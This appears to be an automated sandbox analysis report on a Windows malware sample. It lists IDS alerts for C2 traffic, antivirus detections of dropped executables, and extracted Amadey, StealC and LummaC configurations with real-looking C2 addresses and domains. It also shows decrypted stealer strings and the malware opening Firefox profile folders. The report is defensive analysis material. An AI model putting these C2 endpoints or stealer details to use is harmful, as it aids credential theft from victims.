                          2024-11-21T12:17:53.043455+010020498121A Network Trojan was detected192.168.2.450390188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:32.280965+010020577311Domain Observed Used for C2 Detected192.168.2.449820188.114.96.3443TCP
                          2024-11-21T12:10:34.258098+010020577311Domain Observed Used for C2 Detected192.168.2.449827188.114.96.3443TCP
                          2024-11-21T12:10:36.631226+010020577311Domain Observed Used for C2 Detected192.168.2.449833188.114.96.3443TCP
                          2024-11-21T12:10:38.901090+010020577311Domain Observed Used for C2 Detected192.168.2.449839188.114.96.3443TCP
                          2024-11-21T12:10:41.810382+010020577311Domain Observed Used for C2 Detected192.168.2.449847188.114.96.3443TCP
                          2024-11-21T12:10:44.757165+010020577311Domain Observed Used for C2 Detected192.168.2.449855188.114.96.3443TCP
                          2024-11-21T12:10:47.527138+010020577311Domain Observed Used for C2 Detected192.168.2.449863188.114.96.3443TCP
                          2024-11-21T12:10:48.131331+010020577311Domain Observed Used for C2 Detected192.168.2.449866188.114.96.3443TCP
                          2024-11-21T12:10:50.130333+010020577311Domain Observed Used for C2 Detected192.168.2.449874188.114.96.3443TCP
                          2024-11-21T12:10:53.864817+010020577311Domain Observed Used for C2 Detected192.168.2.449895188.114.96.3443TCP
                          2024-11-21T12:10:54.762290+010020577311Domain Observed Used for C2 Detected192.168.2.449904188.114.96.3443TCP
                          2024-11-21T12:10:56.709616+010020577311Domain Observed Used for C2 Detected192.168.2.449912188.114.96.3443TCP
                          2024-11-21T12:10:59.680672+010020577311Domain Observed Used for C2 Detected192.168.2.449924188.114.96.3443TCP
                          2024-11-21T12:11:04.475126+010020577311Domain Observed Used for C2 Detected192.168.2.449942188.114.96.3443TCP
                          2024-11-21T12:11:07.600906+010020577311Domain Observed Used for C2 Detected192.168.2.449954188.114.96.3443TCP
                          2024-11-21T12:11:11.336257+010020577311Domain Observed Used for C2 Detected192.168.2.449970188.114.96.3443TCP
                          2024-11-21T12:11:21.163905+010020577311Domain Observed Used for C2 Detected192.168.2.450015188.114.96.3443TCP
                          2024-11-21T12:11:24.041143+010020577311Domain Observed Used for C2 Detected192.168.2.450025188.114.96.3443TCP
                          2024-11-21T12:11:29.094370+010020577311Domain Observed Used for C2 Detected192.168.2.450046188.114.96.3443TCP
                          2024-11-21T12:11:32.578927+010020577311Domain Observed Used for C2 Detected192.168.2.450057188.114.96.3443TCP
                          2024-11-21T12:11:38.958680+010020577311Domain Observed Used for C2 Detected192.168.2.450087188.114.96.3443TCP
                          2024-11-21T12:11:40.547449+010020577311Domain Observed Used for C2 Detected192.168.2.450100188.114.96.3443TCP
                          2024-11-21T12:11:41.273369+010020577311Domain Observed Used for C2 Detected192.168.2.450108188.114.96.3443TCP
                          2024-11-21T12:11:43.089608+010020577311Domain Observed Used for C2 Detected192.168.2.450121188.114.96.3443TCP
                          2024-11-21T12:11:44.341390+010020577311Domain Observed Used for C2 Detected192.168.2.450128188.114.96.3443TCP
                          2024-11-21T12:11:46.453210+010020577311Domain Observed Used for C2 Detected192.168.2.450136188.114.96.3443TCP
                          2024-11-21T12:11:49.397179+010020577311Domain Observed Used for C2 Detected192.168.2.450147188.114.96.3443TCP
                          2024-11-21T12:11:51.709309+010020577311Domain Observed Used for C2 Detected192.168.2.450154188.114.96.3443TCP
                          2024-11-21T12:11:53.892117+010020577311Domain Observed Used for C2 Detected192.168.2.450162188.114.96.3443TCP
                          2024-11-21T12:11:56.180915+010020577311Domain Observed Used for C2 Detected192.168.2.450167188.114.96.3443TCP
                          2024-11-21T12:11:59.221974+010020577311Domain Observed Used for C2 Detected192.168.2.450178188.114.96.3443TCP
                          2024-11-21T12:12:01.528454+010020577311Domain Observed Used for C2 Detected192.168.2.450185188.114.96.3443TCP
                          2024-11-21T12:17:35.598228+010020577311Domain Observed Used for C2 Detected192.168.2.450373188.114.97.3443TCP
                          2024-11-21T12:17:37.747965+010020577311Domain Observed Used for C2 Detected192.168.2.450375188.114.97.3443TCP
                          2024-11-21T12:17:40.061879+010020577311Domain Observed Used for C2 Detected192.168.2.450377188.114.97.3443TCP
                          2024-11-21T12:17:42.377655+010020577311Domain Observed Used for C2 Detected192.168.2.450380188.114.97.3443TCP
                          2024-11-21T12:17:44.614539+010020577311Domain Observed Used for C2 Detected192.168.2.450382188.114.97.3443TCP
                          2024-11-21T12:17:46.885052+010020577311Domain Observed Used for C2 Detected192.168.2.450383188.114.97.3443TCP
                          2024-11-21T12:17:49.610585+010020577311Domain Observed Used for C2 Detected192.168.2.450386188.114.97.3443TCP
                          2024-11-21T12:17:50.126756+010020577311Domain Observed Used for C2 Detected192.168.2.450387188.114.97.3443TCP
                          2024-11-21T12:17:52.209861+010020577311Domain Observed Used for C2 Detected192.168.2.450390188.114.97.3443TCP
                          2024-11-21T12:17:52.804072+010020577311Domain Observed Used for C2 Detected192.168.2.450392188.114.97.3443TCP
                          2024-11-21T12:17:54.493975+010020577311Domain Observed Used for C2 Detected192.168.2.450395188.114.97.3443TCP
                          2024-11-21T12:17:56.671400+010020577311Domain Observed Used for C2 Detected192.168.2.450398188.114.97.3443TCP
                          2024-11-21T12:17:58.938981+010020577311Domain Observed Used for C2 Detected192.168.2.450400188.114.97.3443TCP
                          2024-11-21T12:18:01.386689+010020577311Domain Observed Used for C2 Detected192.168.2.450402188.114.97.3443TCP
                          2024-11-21T12:18:03.976057+010020577311Domain Observed Used for C2 Detected192.168.2.450404188.114.97.3443TCP
                          2024-11-21T12:18:07.570325+010020577311Domain Observed Used for C2 Detected192.168.2.450413188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:11:13.529653+010020197142Potentially Bad Traffic192.168.2.449976185.215.113.1680TCP
                          2024-11-21T12:11:48.687100+010020197142Potentially Bad Traffic192.168.2.450144185.215.113.1680TCP
                          2024-11-21T12:12:03.765921+010020197142Potentially Bad Traffic192.168.2.450189185.215.113.1680TCP
                          2024-11-21T12:17:55.072094+010020197142Potentially Bad Traffic192.168.2.450396185.215.113.1680TCP
                          2024-11-21T12:18:09.820088+010020197142Potentially Bad Traffic192.168.2.450415185.215.113.1680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:32.398519+010020446961A Network Trojan was detected192.168.2.449819185.215.113.4380TCP
                          2024-11-21T12:10:41.200761+010020446961A Network Trojan was detected192.168.2.449844185.215.113.4380TCP
                          2024-11-21T12:10:48.281824+010020446961A Network Trojan was detected192.168.2.449867185.215.113.4380TCP
                          2024-11-21T12:10:58.718633+010020446961A Network Trojan was detected192.168.2.449920185.215.113.4380TCP
                          2024-11-21T12:17:37.255645+010020446961A Network Trojan was detected192.168.2.450374185.215.113.4380TCP
                          2024-11-21T12:17:42.427577+010020446961A Network Trojan was detected192.168.2.450379185.215.113.4380TCP
                          2024-11-21T12:17:47.693777+010020446961A Network Trojan was detected192.168.2.450384185.215.113.4380TCP
                          2024-11-21T12:17:53.193279+010020446961A Network Trojan was detected192.168.2.450393185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:51.665682+010020543501A Network Trojan was detected192.168.2.44987734.116.198.13080TCP
                          2024-11-21T12:10:54.375015+010020543501A Network Trojan was detected192.168.2.44990134.116.198.13080TCP
                          2024-11-21T12:11:25.239144+010020543501A Network Trojan was detected192.168.2.45002934.116.198.13080TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:30.776213+010020577301Domain Observed Used for C2 Detected192.168.2.4631031.1.1.153UDP
                          2024-11-21T12:17:34.049276+010020577301Domain Observed Used for C2 Detected192.168.2.4655191.1.1.153UDP
                          2024-11-21T12:18:04.794622+010020577301Domain Observed Used for C2 Detected192.168.2.4529001.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:43.733748+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.449846TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:43.402514+010020442441Malware Command and Control Activity Detected192.168.2.449846185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:44.073585+010020442461Malware Command and Control Activity Detected192.168.2.449846185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:45.666907+010020442481Malware Command and Control Activity Detected192.168.2.449846185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:44.194794+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.449846TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:37.510711+010020480941Malware Command and Control Activity Detected192.168.2.449833188.114.96.3443TCP
                          2024-11-21T12:11:07.616458+010020480941Malware Command and Control Activity Detected192.168.2.449954188.114.96.3443TCP
                          2024-11-21T12:11:41.985268+010020480941Malware Command and Control Activity Detected192.168.2.450108188.114.96.3443TCP
                          2024-11-21T12:17:43.284075+010020480941Malware Command and Control Activity Detected192.168.2.450380188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:42.596457+010020442431Malware Command and Control Activity Detected192.168.2.449846185.215.113.20680TCP
                          2024-11-21T12:11:34.180350+010020442431Malware Command and Control Activity Detected192.168.2.450061185.215.113.20680TCP
                          2024-11-21T12:11:41.868706+010020442431Malware Command and Control Activity Detected192.168.2.450105185.215.113.20680TCP
                          2024-11-21T12:17:41.199415+010020442431Malware Command and Control Activity Detected192.168.2.450378185.215.113.20680TCP
                          2024-11-21T12:17:59.149079+010020442431Malware Command and Control Activity Detected192.168.2.450399185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:23.570866+010028561211A Network Trojan was detected192.168.2.449796185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:07.460828+010028561471A Network Trojan was detected192.168.2.449758185.215.113.4380TCP
                          2024-11-21T12:15:08.233488+010028561471A Network Trojan was detected192.168.2.450321185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:22.162141+010028561221A Network Trojan was detected185.215.113.4380192.168.2.449764TCP
                          2024-11-21T12:17:35.911413+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450371TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:12.045927+010028033053Unknown Traffic192.168.2.44977031.41.244.1180TCP
                          2024-11-21T12:10:25.077979+010028033053Unknown Traffic192.168.2.449802185.215.113.1680TCP
                          2024-11-21T12:10:33.903638+010028033053Unknown Traffic192.168.2.449826185.215.113.1680TCP
                          2024-11-21T12:10:42.711364+010028033053Unknown Traffic192.168.2.449850185.215.113.1680TCP
                          2024-11-21T12:10:49.974307+010028033053Unknown Traffic192.168.2.449870185.215.113.1680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:10:46.553533+010028033043Unknown Traffic192.168.2.449846185.215.113.20680TCP
                          2024-11-21T12:11:04.702537+010028033043Unknown Traffic192.168.2.449916185.215.113.20680TCP
                          2024-11-21T12:11:06.753539+010028033043Unknown Traffic192.168.2.449916185.215.113.20680TCP
                          2024-11-21T12:11:08.202616+010028033043Unknown Traffic192.168.2.449916185.215.113.20680TCP
                          2024-11-21T12:11:09.461237+010028033043Unknown Traffic192.168.2.449916185.215.113.20680TCP
                          2024-11-21T12:11:13.195861+010028033043Unknown Traffic192.168.2.449916185.215.113.20680TCP
                          2024-11-21T12:11:14.404324+010028033043Unknown Traffic192.168.2.449916185.215.113.20680TCP
                          2024-11-21T12:11:20.380126+010028033043Unknown Traffic192.168.2.450013185.215.113.1680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T12:11:45.124798+010028438641A Network Trojan was detected192.168.2.450128188.114.96.3443TCP
                          2024-11-21T12:12:00.237045+010028438641A Network Trojan was detected192.168.2.450178188.114.96.3443TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: file.exeAvira: detected
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: 00000000.00000002.1773808493.0000000000E31000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                          Source: 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
                          Source: 7b9f3f6834.exe.2896.11.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["processhol.sbs", "peepburry828.sbs", "p3ar11fter.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs"], "Build id": "LOGS11--LiveTraffic"}
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeReversingLabs: Detection: 42%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeReversingLabs: Detection: 31%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeReversingLabs: Detection: 42%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeReversingLabs: Detection: 50%
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeReversingLabs: Detection: 42%
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeReversingLabs: Detection: 31%
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeReversingLabs: Detection: 42%
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 50%
                          Source: C:\Users\user\AppData\Local\Temp\service123.exeReversingLabs: Detection: 45%
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeReversingLabs: Detection: 50%
                          Source: file.exeReversingLabs: Detection: 50%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: file.exeJoe Sandbox ML: detected
                          Source: 00000033.00000003.3085480931.0000000005000000.00000004.00001000.00020000.00000000.sdmpString decryptor: p3ar11fter.sbs
                          Source: 00000033.00000003.3085480931.0000000005000000.00000004.00001000.00020000.00000000.sdmpString decryptor: 3xp3cts1aim.sbs
                          Source: 00000033.00000003.3085480931.0000000005000000.00000004.00001000.00020000.00000000.sdmpString decryptor: peepburry828.sbs
                          Source: 00000033.00000003.3085480931.0000000005000000.00000004.00001000.00020000.00000000.sdmpString decryptor: p10tgrace.sbs
                          Source: 00000033.00000003.3085480931.0000000005000000.00000004.00001000.00020000.00000000.sdmpString decryptor: processhol.sbs
                          Source: 00000033.00000003.3085480931.0000000005000000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 00000033.00000003.3085480931.0000000005000000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                          Source: 00000033.00000003.3085480931.0000000005000000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                          Source: 00000033.00000003.3085480931.0000000005000000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                          Source: 00000033.00000003.3085480931.0000000005000000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                          Source: 159c892ab5.exe, 00000008.00000003.2512167516.0000000007302000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_c5fab4ce-7
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49736 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49820 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49827 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49833 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49839 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49847 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49855 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49863 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49866 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49874 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49895 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49912 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49917 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49924 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49929 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49942 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49954 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49970 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49993 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50003 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50015 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50025 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50046 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50057 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:50082 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50087 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50088 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50089 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50091 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.4:50094 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50100 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50106 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50107 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50108 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50109 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50110 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50111 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50121 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50128 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50136 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50147 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50154 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50162 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50167 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50178 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50185 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50194 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50196 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50195 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.126.32.140:443 -> 192.168.2.4:50210 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.126.32.140:443 -> 192.168.2.4:50219 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.126.32.140:443 -> 192.168.2.4:50235 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 20.42.65.92:443 -> 192.168.2.4:50244 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 20.42.65.94:443 -> 192.168.2.4:50289 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50301 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50299 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50302 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50300 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50373 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50375 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50377 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50380 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50382 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50383 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50386 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50387 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50390 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50392 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50395 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50398 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50400 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50402 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50404 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50413 version: TLS 1.2
                          Source: Binary string: The name of the library's debug file. For example, 'xul.pdb source: firefox.exe, 00000030.00000003.2990921853.000001E575D58000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000030.00000003.2990921853.000001E575D58000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 76dd304e1d.exe, 00000020.00000002.2999391422.00000000007C2000.00000040.00000001.01000000.00000013.sdmp, 76dd304e1d.exe, 00000020.00000003.2865776882.0000000004E30000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: The name of the alarm to get. Defaults to the empty string.Whether an alarm of the given name was found to clear.The name of the alarm to clear. Defaults to the empty string.Details of a content script registered programmaticallyReturns the value of the overridden new tab page. Read-only.Unregister a content script registered programmaticallyRepresents information about a contextual identity.The name of the library's debug file. For example, 'xul.pdbInformation to filter the contextual identities being retrieved.After which mouse event context menus should popup.Returns the value of the overridden home page. Read-only.Details about the contextual identity being created.Deletes a contetual identity by its cookie Store ID.Whether to focus the input field and select its contents.If true, the text in the urlbar will also be selected.Stops the profiler and discards any captured profile data.Details about the contextual identity being created.Gathers the profile data from the current profiling session.The name of the provider whose behavior the listener returns.The name of the provider that will listen for engagement events.The name of the provider whose results the listener returns. source: firefox.exe, 00000030.00000003.2990921853.000001E575D58000.00000004.00000800.00020000.00000000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598\Jump to behavior
